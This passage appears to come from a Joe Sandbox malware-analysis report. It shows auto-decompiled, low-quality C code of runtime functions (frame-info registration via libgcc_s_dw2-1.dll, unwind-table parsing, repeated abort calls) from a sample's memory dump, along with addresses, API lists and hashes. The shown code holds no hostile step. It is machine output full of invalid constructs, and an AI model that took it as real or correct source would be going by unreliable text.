																	__eax = 0xffff;
																	goto L10;
																} else {
																	if(__eflags <= 0) {
																		__eflags = __al;
																		if(__al != 0) {
																			goto L44;
																		} else {
																			goto L9;
																		}
																	} else {
																		__eax = __eax - 3;
																		__eflags = __al - 1;
																		if(__al <= 1) {
																			L9:
																			__eax = 0xffffffff;
																			L10:
																			__edx = _v32;
																			__eflags = __edx & __eax;
																			if((__edx & __eax) != 0) {
																				_v48 = _v48 + 1;
																				__eflags = __edx -  *__edi;
																				if(__edx <  *__edi) {
																					 *__edi = __edx;
																				}
																			}
																			goto L13;
																		} else {
																			L44:
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			abort();
																			_push(_t60);
																			_t65 = _t63 - 0x1c;
																			 *_t65 = "libgcc_s_dw2-1.dll";
																			_t47 = GetModuleHandleA(_t53);
																			_t66 = _t65 - 4;
																			if(_t47 == 0) {
																				_t48 = 0x13dae40;
																				_t59 = E013DA660;
																			} else {
																				_t54 = _t47;
																				 *_t66 = "libgcc_s_dw2-1.dll";
																				_t51 = LoadLibraryA(??);
																				_t68 = _t66 - 4;
																				 *0x14f2020 = _t51;
																				_v116 = "__register_frame_info";
																				 *_t68 = _t54;
																				_t52 = GetProcAddress(??, ??);
																				_t69 = _t68 - 8;
																				_t59 = _t52;
																				_v116 = "__deregister_frame_info";
																				 *_t69 = _t54;
																				_t48 = GetProcAddress(??, ??);
																				_t66 = _t69 - 8;
																			}
																			 *0x1481004 = _t48;
																			if(_t59 != 0) {
																				_v116 = 0x14f2024;
																				 *_t66 = 0x14b3104;
																				 *_t59();
																			}
																			 *_t66 = E013C1560;
																			return E013C14A0();
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L54;
						L14:
						__ebx = __ebx +  &_a4;
						__eflags =  *__ebx;
					} while ( *__ebx != 0);
					L40:
					return _v48;
				}
				L54:
			}

0x013d9524
0x013d9527
0x013d952b
0x013d96fc
0x00000000
0x013d9531
0x013d9531
0x013d9533
0x013d953b
0x013d953d
0x013d953f
0x013d9547
0x013d9582
0x013d9582
0x013d9585
0x013d9587
0x00000000
0x013d9589
0x013d9589
0x013d9589
0x013d958c
0x013d958e
0x013d9592
0x013d9594
0x013d9668
0x013d966a
0x00000000
0x013d959a
0x013d959a
0x013d959e
0x013d95a3
0x013d95a5
0x013d95aa
0x013d96e8
0x00000000
0x013d95b0
0x013d95b0
0x013d95b4
0x013d95b6
0x013d9680
0x013d9684
0x013d968c
0x013d9690
0x013d9694
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013d95bc
0x013d95bc
0x013d95bf
0x013d95c1
0x013d96b8
0x013d96bb
0x00000000
0x013d95c7
0x013d95c7
0x013d9658
0x013d9658
0x00000000
0x013d95cd
0x013d95cd
0x013d95cf
0x013d9650
0x013d9652
0x00000000
0x00000000
0x00000000
0x00000000
0x013d95d1
0x013d95d1
0x013d95d4
0x013d95e0
0x013d95e0
0x013d95e4
0x013d95e6
0x013d95eb
0x013d95f0
0x013d969a
0x013d969a
0x013d969f
0x013d96a3
0x013d96a6
0x013d96aa
0x013d96ac
0x00000000
0x013d95f6
0x013d95f6
0x013d95fa
0x013d95fd
0x013d95ff
0x013d96c8
0x013d96cc
0x013d96d0
0x013d96d0
0x013d96d3
0x013d96d8
0x00000000
0x013d9605
0x013d9605
0x013d9605
0x013d9605
0x013d9605
0x013d9609
0x013d9609
0x013d960d
0x013d960f
0x013d960f
0x013d9612
0x013d9615
0x013d961c
0x013d9621
0x013d9626
0x013d9570
0x013d9570
0x00000000
0x013d962c
0x013d962c
0x013d962c
0x013d9631
0x013d9634
0x013d9636
0x013d9670
0x00000000
0x013d9638
0x013d9638
0x013d9550
0x013d9552
0x00000000
0x00000000
0x00000000
0x00000000
0x013d963e
0x013d963e
0x013d9641
0x013d9643
0x013d9558
0x013d9558
0x013d955d
0x013d955d
0x013d9561
0x013d9563
0x013d9565
0x013d956a
0x013d956c
0x013d956e
0x013d956e
0x013d956c
0x00000000
0x013d9649
0x0147aa49
0x0147aa49
0x0147aa4e
0x0147aa53
0x0147aa58
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c0
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x013c1549
0x013d9643
0x013d9638
0x013d9636
0x013d9626
0x013d95ff
0x013d95f0
0x013d95cf
0x013d95c7
0x013d95c1
0x013d95b6
0x013d95aa
0x013d9594
0x00000000
0x013d9574
0x013d9574
0x013d957a
0x013d957a
0x013d96f0
0x013d96fb
0x013d96fb
0x00000000

APIs

abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 4a343e8d6f95212637cbebc6e8e190fe53a7212b0b0e4a3f5782f8f1101a8719
Instruction ID: 1a585a388d1d1ab4eac2148db531d2b38d122431bd53ec994bebb2855ef18899
Opcode Fuzzy Hash: 4a343e8d6f95212637cbebc6e8e190fe53a7212b0b0e4a3f5782f8f1101a8719
Instruction Fuzzy Hash: 0641E772508307CFD720DF2CE08077ABBE5AF9127CF544A2AE4A587655E334D94ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 013D954C Relevance: 15.1, APIs: 10, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E013D954C(void* __eax, CHAR* __ebx, void* __edi, char _a4, signed int _a19, signed int _a20, signed int _a24, signed int _a28, signed int _a44) {
				void* _v16;
				char* _v40;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				struct HINSTANCE__* _t47;
				_Unknown_base(*)()* _t48;
				CHAR* _t49;
				struct HINSTANCE__* _t51;
				void* _t52;
				_Unknown_base(*)()* _t56;
				void* _t61;
				char** _t62;
				char** _t63;
				struct HINSTANCE__** _t65;
				struct HINSTANCE__** _t66;

				_t52 = __edi;
				_t49 = __ebx;
				while(1) {
					L7:
					__eflags = __al;
					if(__al != 0) {
						break;
					} else {
						goto L8;
					}
					do {
						L8:
						__eax = 0xffffffff;
						while(1) {
							__edx = _a44;
							__eflags = __edx & __eax;
							if((__edx & __eax) != 0) {
								_a28 = _a28 + 1;
								__eflags = __edx -  *__edi;
								if(__edx <  *__edi) {
									 *__edi = __edx;
								}
							}
							do {
								L12:
								__edx = _a20;
								while(1) {
									__ebx = __ebx +  &_a4;
									__eflags =  *__ebx;
									if( *__ebx == 0) {
										break;
									}
									__eax = __ebx[1];
									__eflags = __eax;
									if(__eax == 0) {
										continue;
									} else {
										_t14 =  &(__ebx[1]); // 0x5
										__ecx = _t14;
										__ecx = _t14 - __eax;
										_a20 = __ecx;
										__eflags = __ecx - __edx;
										if(__ecx == __edx) {
											__eax = __esi;
											_a19 = __al;
											goto L25;
										} else {
											__eax = _a20;
											__eax = E013D91E0(_a20);
											__esi = __eax;
											__eflags = __eax - 0xff;
											if(__eax == 0xff) {
												_a28 = 0xffffffff;
												break;
											} else {
												_a19 = __al;
												__eflags = __al - 0xff;
												if(__al == 0xff) {
													__eax = __edi[4] & 0x0000ffff;
													_a24 = 0;
													__ax = __ax & 0x000007f8;
													__eflags = __ax - 0x7f8;
													if(__ax != 0x7f8) {
														goto L24;
													} else {
														goto L35;
													}
													goto L25;
												} else {
													__eax = __eax & 0x00000070;
													__eflags = __al - 0x20;
													if(__eflags == 0) {
														__eax = __edi[1];
														_a24 = __edi[1];
														goto L22;
													} else {
														if(__eflags <= 0) {
															L31:
															_a24 = 0;
															goto L22;
														} else {
															__eflags = __al - 0x30;
															if(__al != 0x30) {
																__eflags = __al - 0x50;
																if(__al != 0x50) {
																	L42:
																	abort();
																	abort();
																	abort();
																	abort();
																	abort();
																	abort();
																	abort();
																	abort();
																	abort();
																	abort();
																	_push(_t52);
																	_t62 = _t61 - 0x1c;
																	 *_t62 = "libgcc_s_dw2-1.dll";
																	_t43 = GetModuleHandleA(_t49);
																	_t63 = _t62 - 4;
																	if(_t43 == 0) {
																		_t44 = 0x13dae40;
																		_t56 = E013DA660;
																	} else {
																		_t51 = _t43;
																		 *_t63 = "libgcc_s_dw2-1.dll";
																		_t47 = LoadLibraryA(??);
																		_t65 = _t63 - 4;
																		 *0x14f2020 = _t47;
																		_v40 = "__register_frame_info";
																		 *_t65 = _t51;
																		_t48 = GetProcAddress(??, ??);
																		_t66 = _t65 - 8;
																		_t56 = _t48;
																		_v40 = "__deregister_frame_info";
																		 *_t66 = _t51;
																		_t44 = GetProcAddress(??, ??);
																		_t63 = _t66 - 8;
																	}
																	 *0x1481004 = _t44;
																	if(_t56 != 0) {
																		_v40 = 0x14f2024;
																		 *_t63 = 0x14b3104;
																		 *_t56();
																	}
																	 *_t63 = E013C1560;
																	return E013C14A0();
																} else {
																	goto L31;
																}
															} else {
																__eax = __edi[2];
																_a24 = __edi[2];
																L22:
																__eax = __edi[4] & 0x0000ffff;
																__edx = __edi[4] & 0x0000ffff;
																__dx = __dx & 0x000007f8;
																__eflags = __dx - 0x7f8;
																if(__dx == 0x7f8) {
																	L35:
																	__edx = _a19 & 0x000000ff;
																	__eax = __edi[4] & 0x0000ffff;
																	__edx = (_a19 & 0x000000ff) << 3;
																	__ax = __ax & 0x0000f807;
																	__eax = __edi[4] & 0x0000ffff | (_a19 & 0x000000ff) << 0x00000003;
																	__edi[4] = __ax;
																	goto L25;
																} else {
																	__ax = __ax >> 3;
																	__eax = __al & 0x000000ff;
																	__eflags = (__al & 0x000000ff) - __esi;
																	if((__al & 0x000000ff) == __esi) {
																		__eax =  &_a44;
																		__edx = _a24;
																		_t39 =  &(__ebx[2]); // 0x9
																		__ecx = _t39;
																		 *__esp =  &_a44;
																		__esi = E013D9050(__esi, _t39, _a24);
																		goto L26;
																	} else {
																		L24:
																		_t21 =  &(__edi[4]);
																		 *_t21 = __edi[4] | 0x00000004;
																		__eflags =  *_t21;
																		goto L25;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									L52:
								}
								__eax = _a28;
								__esp = __esp + 0x3c;
								_pop(__ebx);
								_pop(__esi);
								_pop(__edi);
								return _a28;
								goto L52;
								L25:
								__edx =  &_a44;
								__eax = __esi;
								_t24 =  &(__ebx[2]); // 0x9
								__ecx = _t24;
								 *__esp =  &_a44;
								__edx = _a24;
								__al & 0x000000ff = E013D9050(__al & 0x000000ff, _t24, _a24);
								__eflags = _a19 - 0xff;
							} while (_a19 == 0xff);
							L26:
							__eax = _a19 & 0x000000ff;
							__eax = _a19 & 7;
							__eflags = __al - 2;
							if(__eflags == 0) {
								__eax = 0xffff;
								__edx = _a44;
								__eflags = __edx & __eax;
								if((__edx & __eax) != 0) {
									_a28 = _a28 + 1;
									__eflags = __edx -  *__edi;
									if(__edx <  *__edi) {
										 *__edi = __edx;
									}
								}
								goto L12;
							} else {
								if(__eflags <= 0) {
									goto L7;
								} else {
									break;
								}
							}
							goto L52;
						}
						__eax = __eax - 3;
						__eflags = __al - 1;
					} while (__al <= 1);
					goto L42;
				}
				goto L42;
			}

0x013d954c
0x013d954c
0x013d9550
0x013d9550
0x013d9550
0x013d9552
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9558
0x013d9558
0x013d9558
0x013d955d
0x013d955d
0x013d9561
0x013d9563
0x013d9565
0x013d956a
0x013d956c
0x013d956e
0x013d956e
0x013d956c
0x013d9570
0x013d9570
0x013d9570
0x013d9574
0x013d9574
0x013d957a
0x013d957c
0x00000000
0x00000000
0x013d9582
0x013d9585
0x013d9587
0x00000000
0x013d9589
0x013d9589
0x013d9589
0x013d958c
0x013d958e
0x013d9592
0x013d9594
0x013d9668
0x013d966a
0x00000000
0x013d959a
0x013d959a
0x013d959e
0x013d95a3
0x013d95a5
0x013d95aa
0x013d96e8
0x00000000
0x013d95b0
0x013d95b0
0x013d95b4
0x013d95b6
0x013d9680
0x013d9684
0x013d968c
0x013d9690
0x013d9694
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013d95bc
0x013d95bc
0x013d95bf
0x013d95c1
0x013d96b8
0x013d96bb
0x00000000
0x013d95c7
0x013d95c7
0x013d9658
0x013d9658
0x00000000
0x013d95cd
0x013d95cd
0x013d95cf
0x013d9650
0x013d9652
0x0147aa49
0x0147aa49
0x0147aa4e
0x0147aa53
0x0147aa58
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c3
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x00000000
0x00000000
0x00000000
0x013d95d1
0x013d95d1
0x013d95d4
0x013d95e0
0x013d95e0
0x013d95e4
0x013d95e6
0x013d95eb
0x013d95f0
0x013d969a
0x013d969a
0x013d969f
0x013d96a3
0x013d96a6
0x013d96aa
0x013d96ac
0x00000000
0x013d95f6
0x013d95f6
0x013d95fa
0x013d95fd
0x013d95ff
0x013d96c8
0x013d96cc
0x013d96d0
0x013d96d0
0x013d96d3
0x013d96d8
0x00000000
0x013d9605
0x013d9605
0x013d9605
0x013d9605
0x013d9605
0x00000000
0x013d9605
0x013d95ff
0x013d95f0
0x013d95cf
0x013d95c7
0x013d95c1
0x013d95b6
0x013d95aa
0x013d9594
0x00000000
0x013d9587
0x013d96f0
0x013d96f4
0x013d96f7
0x013d96f8
0x013d96f9
0x013d96fb
0x00000000
0x013d9609
0x013d9609
0x013d960d
0x013d960f
0x013d960f
0x013d9612
0x013d9615
0x013d961c
0x013d9621
0x013d9621
0x013d962c
0x013d962c
0x013d9631
0x013d9634
0x013d9636
0x013d9670
0x013d955d
0x013d9561
0x013d9563
0x013d9565
0x013d956a
0x013d956c
0x013d956e
0x013d956e
0x013d956c
0x00000000
0x013d9638
0x013d9638
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9638
0x00000000
0x013d9636
0x013d963e
0x013d9641
0x013d9641
0x00000000
0x013d9649
0x00000000

APIs

abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2c6bbe2831c18bd0d48b8c2d7a600a0618961f5a944c70f57e858e520f603289
Instruction ID: 316cc2ebc53873868f413b1f6b3b539dd0f44be11fd8873d2f9681534726a36a
Opcode Fuzzy Hash: 2c6bbe2831c18bd0d48b8c2d7a600a0618961f5a944c70f57e858e520f603289
Instruction Fuzzy Hash: 3B21DB725043068BDB34DE3CD04077ABBE1AF9123CF484A19E5A597255E330D94AC792

Uniqueness

Uniqueness Score: -1.00%

Function 013D96C4 Relevance: 15.0, APIs: 10, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E013D96C4(CHAR* __ebx, void* __esi, char _a4, signed int _a19, signed int _a20, signed int _a24, signed int _a28, signed int _a44) {
				void* _v16;
				char* _v40;
				signed int* __edi;
				struct HINSTANCE__* _t42;
				_Unknown_base(*)()* _t43;
				struct HINSTANCE__* _t46;
				_Unknown_base(*)()* _t47;
				CHAR* _t48;
				struct HINSTANCE__* _t50;
				void* _t54;
				_Unknown_base(*)()* _t55;
				void* _t60;
				char** _t61;
				char** _t62;
				struct HINSTANCE__** _t64;
				struct HINSTANCE__** _t65;

				_t54 = __esi;
				_t48 = __ebx;
				while(1) {
					L37:
					__eax =  &_a44;
					__edx = _a24;
					_t39 =  &(__ebx[2]); // 0x9
					__ecx = _t39;
					 *__esp =  &_a44;
					__esi = E013D9050(__esi, _t39, _a24);
					while(1) {
						__eax = _a19 & 0x000000ff;
						__eax = _a19 & 7;
						__eflags = __al - 2;
						if(__eflags == 0) {
							goto L33;
						}
						L27:
						if(__eflags <= 0) {
							__eflags = __al;
							if(__al != 0) {
								goto L42;
							} else {
								goto L8;
							}
						} else {
							__eax = __eax - 3;
							__eflags = __al - 1;
							if(__al <= 1) {
								L8:
								__eax = 0xffffffff;
								L9:
								__edx = _a44;
								__eflags = __edx & __eax;
								if((__edx & __eax) != 0) {
									_a28 = _a28 + 1;
									__eflags = __edx -  *__edi;
									if(__edx <  *__edi) {
										 *__edi = __edx;
									}
								}
								do {
									__edx = _a20;
									while(1) {
										__ebx = __ebx +  &_a4;
										__eflags =  *__ebx;
										if( *__ebx == 0) {
											break;
										}
										__eax = __ebx[1];
										__eflags = __eax;
										if(__eax == 0) {
											continue;
										} else {
											_t14 =  &(__ebx[1]); // 0x5
											__ecx = _t14;
											__ecx = _t14 - __eax;
											_a20 = __ecx;
											__eflags = __ecx - __edx;
											if(__ecx == __edx) {
												__eax = __esi;
												_a19 = __al;
												goto L25;
											} else {
												__eax = _a20;
												__eax = E013D91E0(_a20);
												__esi = __eax;
												__eflags = __eax - 0xff;
												if(__eax == 0xff) {
													_a28 = 0xffffffff;
													break;
												} else {
													_a19 = __al;
													__eflags = __al - 0xff;
													if(__al == 0xff) {
														__eax = __edi[4] & 0x0000ffff;
														_a24 = 0;
														__ax = __ax & 0x000007f8;
														__eflags = __ax - 0x7f8;
														if(__ax != 0x7f8) {
															goto L24;
														} else {
															goto L35;
														}
														goto L25;
													} else {
														__eax = __eax & 0x00000070;
														__eflags = __al - 0x20;
														if(__eflags == 0) {
															__eax = __edi[1];
															_a24 = __edi[1];
															goto L22;
														} else {
															if(__eflags <= 0) {
																L31:
																_a24 = 0;
																goto L22;
															} else {
																__eflags = __al - 0x30;
																if(__al != 0x30) {
																	__eflags = __al - 0x50;
																	if(__al != 0x50) {
																		goto L42;
																	} else {
																		goto L31;
																	}
																} else {
																	__eax = __edi[2];
																	_a24 = __edi[2];
																	L22:
																	__eax = __edi[4] & 0x0000ffff;
																	__edx = __edi[4] & 0x0000ffff;
																	__dx = __dx & 0x000007f8;
																	__eflags = __dx - 0x7f8;
																	if(__dx == 0x7f8) {
																		L35:
																		__edx = _a19 & 0x000000ff;
																		__eax = __edi[4] & 0x0000ffff;
																		__edx = (_a19 & 0x000000ff) << 3;
																		__ax = __ax & 0x0000f807;
																		__eax = __edi[4] & 0x0000ffff | (_a19 & 0x000000ff) << 0x00000003;
																		__edi[4] = __ax;
																		goto L25;
																	} else {
																		__ax = __ax >> 3;
																		__eax = __al & 0x000000ff;
																		__eflags = (__al & 0x000000ff) - __esi;
																		if((__al & 0x000000ff) == __esi) {
																			goto L37;
																		} else {
																			L24:
																			_t21 =  &(__edi[4]);
																			 *_t21 = __edi[4] | 0x00000004;
																			__eflags =  *_t21;
																			goto L25;
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
										goto L52;
									}
									__eax = _a28;
									__esp = __esp + 0x3c;
									_pop(__ebx);
									_pop(__esi);
									_pop(__edi);
									return _a28;
									goto L52;
									L25:
									__edx =  &_a44;
									__eax = __esi;
									_t24 =  &(__ebx[2]); // 0x9
									__ecx = _t24;
									 *__esp =  &_a44;
									__edx = _a24;
									__al & 0x000000ff = E013D9050(__al & 0x000000ff, _t24, _a24);
									__eflags = _a19 - 0xff;
								} while (_a19 == 0xff);
								__eax = _a19 & 0x000000ff;
								__eax = _a19 & 7;
								__eflags = __al - 2;
								if(__eflags == 0) {
									goto L33;
								}
							} else {
								L42:
								abort();
								abort();
								abort();
								abort();
								abort();
								abort();
								abort();
								abort();
								abort();
								abort();
								_push(_t54);
								_t61 = _t60 - 0x1c;
								 *_t61 = "libgcc_s_dw2-1.dll";
								_t42 = GetModuleHandleA(_t48);
								_t62 = _t61 - 4;
								if(_t42 == 0) {
									_t43 = 0x13dae40;
									_t55 = E013DA660;
								} else {
									_t50 = _t42;
									 *_t62 = "libgcc_s_dw2-1.dll";
									_t46 = LoadLibraryA(??);
									_t64 = _t62 - 4;
									 *0x14f2020 = _t46;
									_v40 = "__register_frame_info";
									 *_t64 = _t50;
									_t47 = GetProcAddress(??, ??);
									_t65 = _t64 - 8;
									_t55 = _t47;
									_v40 = "__deregister_frame_info";
									 *_t65 = _t50;
									_t43 = GetProcAddress(??, ??);
									_t62 = _t65 - 8;
								}
								 *0x1481004 = _t43;
								if(_t55 != 0) {
									_v40 = 0x14f2024;
									 *_t62 = 0x14b3104;
									 *_t55();
								}
								 *_t62 = E013C1560;
								return E013C14A0();
							}
						}
						L52:
						L33:
						__eax = 0xffff;
						goto L9;
					}
				}
			}

0x013d96c4
0x013d96c4
0x013d96c8
0x013d96c8
0x013d96c8
0x013d96cc
0x013d96d0
0x013d96d0
0x013d96d3
0x013d96d8
0x013d962c
0x013d962c
0x013d9631
0x013d9634
0x013d9636
0x00000000
0x00000000
0x013d9638
0x013d9638
0x013d9550
0x013d9552
0x00000000
0x00000000
0x00000000
0x00000000
0x013d963e
0x013d963e
0x013d9641
0x013d9643
0x013d9558
0x013d9558
0x013d955d
0x013d955d
0x013d9561
0x013d9563
0x013d9565
0x013d956a
0x013d956c
0x013d956e
0x013d956e
0x013d956c
0x013d9570
0x013d9570
0x013d9574
0x013d9574
0x013d957a
0x013d957c
0x00000000
0x00000000
0x013d9582
0x013d9585
0x013d9587
0x00000000
0x013d9589
0x013d9589
0x013d9589
0x013d958c
0x013d958e
0x013d9592
0x013d9594
0x013d9668
0x013d966a
0x00000000
0x013d959a
0x013d959a
0x013d959e
0x013d95a3
0x013d95a5
0x013d95aa
0x013d96e8
0x00000000
0x013d95b0
0x013d95b0
0x013d95b4
0x013d95b6
0x013d9680
0x013d9684
0x013d968c
0x013d9690
0x013d9694
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013d95bc
0x013d95bc
0x013d95bf
0x013d95c1
0x013d96b8
0x013d96bb
0x00000000
0x013d95c7
0x013d95c7
0x013d9658
0x013d9658
0x00000000
0x013d95cd
0x013d95cd
0x013d95cf
0x013d9650
0x013d9652
0x00000000
0x00000000
0x00000000
0x00000000
0x013d95d1
0x013d95d1
0x013d95d4
0x013d95e0
0x013d95e0
0x013d95e4
0x013d95e6
0x013d95eb
0x013d95f0
0x013d969a
0x013d969a
0x013d969f
0x013d96a3
0x013d96a6
0x013d96aa
0x013d96ac
0x00000000
0x013d95f6
0x013d95f6
0x013d95fa
0x013d95fd
0x013d95ff
0x00000000
0x013d9605
0x013d9605
0x013d9605
0x013d9605
0x013d9605
0x00000000
0x013d9605
0x013d95ff
0x013d95f0
0x013d95cf
0x013d95c7
0x013d95c1
0x013d95b6
0x013d95aa
0x013d9594
0x00000000
0x013d9587
0x013d96f0
0x013d96f4
0x013d96f7
0x013d96f8
0x013d96f9
0x013d96fb
0x00000000
0x013d9609
0x013d9609
0x013d960d
0x013d960f
0x013d960f
0x013d9612
0x013d9615
0x013d961c
0x013d9621
0x013d9621
0x013d962c
0x013d9631
0x013d9634
0x013d9636
0x00000000
0x00000000
0x013d9649
0x0147aa49
0x0147aa49
0x0147aa4e
0x0147aa53
0x0147aa58
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c4
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x013c1549
0x013d9643
0x00000000
0x013d9670
0x013d9670
0x00000000
0x013d9670
0x013d962c

APIs

abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
